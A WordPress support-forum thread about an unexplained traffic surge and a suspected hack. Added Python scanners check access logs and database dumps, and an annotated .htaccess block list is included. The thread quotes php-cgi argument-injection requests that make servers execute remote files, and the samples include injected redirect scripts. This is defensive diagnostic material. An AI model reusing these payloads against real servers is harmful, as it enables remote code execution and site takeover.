• webmistressofthedark

    (@webmistressofthedark)


    I see something here that looks like it is the solution to my problem.

    Between March 4-20 my bandwidth went crazy with apparently 1M hits on the /. I have examined every index.php file to no avail. I’ve tried to view exit site links to no avail.

    I have found the ‘archipelago’ bit mentioned in the following closed post, but have not removed it yet.

    I will first compare to the fresh files.

    https://www.remarpro.com/support/topic/top-of-page-the-page-you-are-looking-for-is-temporarily-unavailable?replies=20

    I do not know where to find the xmlrpc.php?rd reference (in what file) but still looking.

    Blog and site are intact, working, but millions of hits from bouncing people to spam links is destroying my bandwidth.

    Will a fresh install on a new server take care of this? Or is there something mal I will be carrying over inside the DB???

  • Thread Starter webmistressofthedark

    (@webmistressofthedark)

    I just checked the original files and the ‘archipelago’ link was there to begin with.

    Thread Starter webmistressofthedark

    (@webmistressofthedark)

    I see in the stats some stuff like this appended to an index.php file access:

    /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttps://61.19.253.26/echo.txt

    /index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=https://75.99.7.131/changlog.txt

    I see the admin-ajax.php file was also accessed… am I getting closer?

    THE PROBLEM IS, I MUST determine if this is in the back end files or the DB itself before I move the site. If in the back end, no worries, a new install will take care of that. But if in the DB, I would simply be reintroducing it on the new host.
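An added example, not part of the thread, showing how to pick requests of the shape quoted above out of a raw Apache access log. A query string that begins with `-` and carries `-dallow_url_include=On -dauto_prepend_file=http://...` is the php-cgi argument-injection pattern (CVE-2012-1823): when PHP runs as a CGI binary, such a query string is handed to it as command-line switches, and `auto_prepend_file` pointed at a remote URL makes PHP execute that file before the requested script. The log lines, IP addresses and payload URLs below are constructed for the example; only the two query-string shapes are taken from the post above.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in Apache "combined" log format. They are not the
# poster's logs; the first two query strings copy the two shapes quoted in the
# thread (one still percent-encoded, one already decoded by the stats tool),
# with the addresses replaced by documentation-range IPs.
SAMPLE_LOG = r'''
203.0.113.7 - - [10/Mar/2013:04:12:01 +0000] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://198.51.100.9/echo.txt HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2013:04:12:02 +0000] "POST /index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://198.51.100.9/changlog.txt HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2013:04:13:10 +0000] "GET /?p=42 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2013:04:13:11 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 61 "https://example.org/wp-admin/" "Mozilla/5.0"
192.0.2.55 - - [10/Mar/2013:04:14:00 +0000] "GET /index.php?-s HTTP/1.1" 200 30011 "-" "curl/7.29"
'''

# Lenient request-line match: the target may contain literal spaces when a
# stats tool has already decoded it, so it is matched lazily up to " HTTP/x.y".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# php.ini directives that, when forced through "-d", turn the request into
# remote code execution or source disclosure rather than mere noise.
DANGEROUS_DIRECTIVES = {
    'auto_prepend_file', 'auto_append_file', 'allow_url_include',
    'allow_url_fopen', 'disable_functions', 'safe_mode', 'open_basedir',
}


def parse_php_switches(decoded_query):
    """Pull php-cgi command-line switches out of a decoded query string.

    Returns (directives, source_dump): the "-d name=value" pairs as a dict
    and whether "-s" (print the script source) was present.
    """
    tokens = decoded_query.split()
    directives, source_dump = {}, False
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == '-s':
            source_dump = True
        elif tok.startswith('-d'):
            arg = tok[2:]
            if not arg and i + 1 < len(tokens):   # "-d name=value" written with a space
                i += 1
                arg = tokens[i]
            name, _, value = arg.partition('=')
            directives[name] = value
        i += 1
    return directives, source_dump


def analyse_request(target):
    """Classify one request target: None for an ordinary request, otherwise
    a dict describing the smuggled php-cgi switches."""
    query = urlsplit(target).query
    if not query:
        return None
    # unquote_plus turns both "%3d" and "+" back into "=" and space, so the
    # encoded and the pre-decoded shapes from the thread end up identical.
    directives, source_dump = parse_php_switches(unquote_plus(query))
    dangerous = sorted(DANGEROUS_DIRECTIVES & set(directives))
    if not dangerous and not source_dump:
        return None
    return {
        'directives': directives,
        'dangerous': dangerous,
        'source_dump': source_dump,
        # the remote file PHP would execute before the real script
        'remote_include': directives.get('auto_prepend_file'),
    }


def scan_log(text):
    """Walk log lines; return (findings, hits per source IP, payload URL counts)."""
    findings, per_ip, payload_urls = [], Counter(), Counter()
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = analyse_request(m.group('target'))
        if verdict is None:
            continue
        findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                         'method': m.group('method'), **verdict})
        per_ip[m.group('ip')] += 1
        if verdict['remote_include']:
            payload_urls[verdict['remote_include']] += 1
    return findings, per_ip, payload_urls


if __name__ == '__main__':
    findings, per_ip, payload_urls = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f"{f['ts']} {f['ip']} {f['method']} dangerous={f['dangerous']} "
              f"source_dump={f['source_dump']} include={f['remote_include']}")
    print('hits per IP:', dict(per_ip))
    print('payload URLs (fetch only from an isolated sandbox):', dict(payload_urls))
```

Replace SAMPLE_LOG with the real access log to get the per-IP counts and the list of payload URLs the requests pointed at. A 200 status on these lines does not by itself show that the include ran; that depends on whether the server executes PHP through php-cgi and whether it is patched. If it did run, the attacker's code executed on the web server, which is where to look first (files, cron, injected PHP), while a database-only infection would show up as altered posts or options.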

    Marvel Labs

    (@royalprince)

    Please upgrade WordPress to the latest version.

    Looks like somebody is trying to gain access through an SQL injection procedure.

    Please intimate your web hosting provider as well.

    Thread Starter webmistressofthedark

    (@webmistressofthedark)

    They already have. The question is, is it in the theme files, the back end files, or the DB?

    If the first two, no matter as I will be installing fresh on a new server.

    It is the DB I am concerned about.

    The redirects are going on right now, because even as I type the hits are racking up, 12,000 today alone. But every place I look I cannot seem to pinpoint what is doing the redirections.

    I have examined .htaccess files, back end files, plugins, blog posts, everything.

    Marvel Labs

    (@royalprince)

    The attacks can be external as well as internal. If they are external you can always edit your .htaccess file as follows:

    # Comments added for each rule; two defects in the widely copied version
    # of this rule set are corrected on the lines marked "fixed".
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    # Refuse unusual request methods. HEAD is a legitimate method used by
    # monitors and caches, so blocking it can have side effects.
    RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]
    RewriteRule ^(.*)$ - [F,L]
    # Refuse query strings carrying typical injection or remote-include
    # payloads; the "-dauto_prepend_file=http://..." requests above contain
    # "http:" or "https:" and so match the two conditions for those.
    RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR]
    RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
    # Caution: also blocks WordPress tag archives requested as ?tag=...
    RewriteCond %{QUERY_STRING} tag\= [NC,OR]
    RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
    RewriteCond %{QUERY_STRING} http\: [NC,OR]
    RewriteCond %{QUERY_STRING} https\: [NC,OR]
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [NC,OR]
    RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
    # fixed: the copied version had a stray mis-encoded character ("ê") in this list
    RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|"|;|\?|\*|=$).* [NC,OR]
    # fixed: the copied version read ("|'|<|>|\|{||), whose empty alternatives
    # match every query string, so every visitor without the login cookie got a 403
    RewriteCond %{QUERY_STRING} ^.*("|'|<|>|\||\{|\}).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(%24&x).* [NC,OR]
    # Caution: %C..%F also match ordinary UTF-8 percent-encoding, e.g. in search terms
    RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
    # Caution: plain words such as "select" or "request" also occur in
    # ordinary search queries, which this condition will block too
    RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare).* [NC]
    # Apply the query-string rules only to visitors without a WordPress login cookie
    RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$
    RewriteRule ^(.*)$ - [F,L]
    </IfModule>

    Prevent access to sensitive files (.htaccess)

    # Apache 2.2 syntax. On Apache 2.4 the "Order allow,deny" / "Deny from all"
    # pairs need mod_access_compat; otherwise use "Require all denied" instead.
    # Directory listings are disabled first so stray files cannot be browsed.
    Options All -Indexes
    <files .htaccess>
    Order allow,deny
    Deny from all
    </files>
    <files readme.html>
    Order allow,deny
    Deny from all
    </files>
    <files license.txt>
    Order allow,deny
    Deny from all
    </files>
    <files install.php>
    Order allow,deny
    Deny from all
    </files>
    # wp-config.php holds the database credentials; it must never be served raw
    <files wp-config.php>
    Order allow,deny
    Deny from all
    </files>
    <files error_log>
    Order allow,deny
    Deny from all
    </files>
    <files fantastico_fileslist.txt>
    Order allow,deny
    Deny from all
    </files>
    <files fantversion.php>
    Order allow,deny
    Deny from all
    </files>

    A tool like Mole, sqlmap etc. can be configured to automate SQL injection using proxies, so it can be an external attack without compromising any internal files.

    If it's an internal attack, and you are worried about the protection of the database, perform a clean installation of WordPress and import/export the content using the WordPress tool. Create a new database with unique table names and integrate it with the WordPress installation.

    We can then determine if the attack is internal or external. Your hosting provider can always determine if you are attracting the traffic or there is external traffic bound your way.
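An added example, not part of the thread or of WordPress, for the question the thread keeps returning to: whether the injected content lives in the database. It scans a mysqldump export for the patterns a redirect hack leaves in wp_posts, wp_options and wp_postmeta (script and iframe tags, meta refresh, JavaScript location changes, eval) and additionally decodes base64 literals passed to base64_decode() so that a payload hidden that way is checked as well. The rows are constructed in code (the table layout is simplified and the base64 blob is generated so it is guaranteed to decode); `mysqldump --skip-extended-insert` produces one INSERT per line as assumed here, while the default extended format puts many rows on one line, which the scanner still flags, by line rather than by row.

```python
import base64
import re

# Constructed mysqldump-style rows; they are not the poster's database.
# The base64 blob is produced in code so it is guaranteed to decode.
_B64 = base64.b64encode(b"window.location='http://203.0.113.9/'").decode()
_INJECTED_JS = f'<script>eval(base64_decode("{_B64}"));</script>'
_WIDGET = (f'a:1:{{i:2;a:2:{{s:5:"title";s:0:"";s:4:"text";'
           f's:{len(_INJECTED_JS)}:"{_INJECTED_JS}";}}}}')


def sql_quote(value):
    """Quote a value the way mysqldump writes it (backslash, ' and " escaped)."""
    if isinstance(value, int):
        return str(value)
    escaped = value.replace('\\', '\\\\').replace("'", "\\'").replace('"', '\\"')
    return f"'{escaped}'"


def insert_row(table, *values):
    return f"INSERT INTO `{table}` VALUES ({','.join(sql_quote(v) for v in values)});"


SAMPLE_DUMP = '\n'.join([
    insert_row('wp_posts', 11, 1, '2013-03-01 10:00:00', 'Welcome',
               '<p>Hello world, this is a normal post.</p>', 'publish'),
    insert_row('wp_posts', 12, 1, '2013-03-05 02:13:44', 'Offer',
               '<p>Great deals</p><script src="http://203.0.113.9/js.php"></script>', 'publish'),
    insert_row('wp_options', 95, 'widget_text', _WIDGET, 'yes'),
    insert_row('wp_options', 96, 'blogname', 'My Blog', 'yes'),
    insert_row('wp_postmeta', 300, 12, '_redirect',
               '<meta http-equiv="refresh" content="0;url=http://203.0.113.9/">'),
])

# Patterns typical of injected redirect/spam content in posts, options and meta.
SUSPICIOUS = {
    'script_tag':    re.compile(r'<script\b', re.I),
    'iframe':        re.compile(r'<iframe\b', re.I),
    'meta_refresh':  re.compile(r'http-equiv=["\']?refresh', re.I),
    'js_redirect':   re.compile(r'(?:window|document)\.location\s*=', re.I),
    'php_eval':      re.compile(r'\beval\s*\(', re.I),
    'base64_decode': re.compile(r'base64_decode\s*\(', re.I),
}
B64_ARG = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']')
ROW = re.compile(r'^INSERT INTO `(?P<table>\w+)` VALUES \((?P<values>.*)\);$')
_ESCAPES = {'n': '\n', 'r': '\r', 't': '\t', '0': '\0', 'Z': '\x1a'}


def unescape_sql(s):
    # Undo mysqldump escaping so the values compare like the stored bytes.
    return re.sub(r'\\(.)', lambda m: _ESCAPES.get(m.group(1), m.group(1)), s)


def decode_b64_payloads(text):
    """Decode every base64 literal handed to base64_decode(); skip junk."""
    out = []
    for m in B64_ARG.finditer(text):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode('utf-8', 'replace'))
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
    return out


def scan_dump(text):
    """One finding per INSERT line whose values, or the base64 hidden inside
    them, match a suspicious pattern."""
    findings = []
    for lineno, line in enumerate(text.strip().splitlines(), 1):
        m = ROW.match(line)
        if not m:
            continue
        values = unescape_sql(m.group('values'))
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(values)]
        decoded = decode_b64_payloads(values)
        for payload in decoded:
            hits += [f'decoded:{name}' for name, rx in SUSPICIOUS.items() if rx.search(payload)]
        if hits:
            findings.append({'line': lineno, 'table': m.group('table'),
                             'hits': hits, 'decoded': decoded})
    return findings


if __name__ == '__main__':
    for f in scan_dump(SAMPLE_DUMP):
        print(f"line {f['line']} {f['table']}: {', '.join(f['hits'])}")
        for payload in f['decoded']:
            print('   decoded payload:', payload)
```

Run it over the real dump (`scan_dump(open('site.sql').read())`). Hits in wp_posts or wp_options mean a fresh file install on a new host carries the problem over unless those rows are cleaned before import; an empty report only shows that these particular patterns are absent, not that the database is clean, so check the dump for unexpected admin users in wp_users as well.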

    Thread Starter webmistressofthedark

    (@webmistressofthedark)

    Thank you for your efforts but I do not understand a word of this.

    All I know is, since the site was turned back on today, it has 12,000 hits so I did not block every single IP that I could have.

    In the space of 15 days it had well over a MILLION hits. This is not normal…

    Thread Starter webmistressofthedark

    (@webmistressofthedark)

    I’m shocked at how many people post that their bandwidth was exceeded and yet no one offers them the possibility that they are being used to spam or have been hacked.

    I knew that 1.5M hits on my site in 15 days was not normal, but we are having a terrible time finding the hack. I’ve looked through every file.

    Now what?

    If your site gets 1,000 hits per day and suddenly it is getting 12,000 hits as mine did today, there has to be something wrong.

    Thread Starter webmistressofthedark

    (@webmistressofthedark)

    I have gone through every back end and theme file and the DB and nothing is amiss. But I am still getting massive hits, all from noted spammers’ IPs, thousands. I have blocked the countries, but still today had 9,000+ hits on a site that is only supposed to have 1,000 per day or so.

    How does one block who or what is doing this completely?

    I would say it’s not spam but a DoS attack on my site alone.

  • The topic ‘Invisible Hack’ is closed to new replies.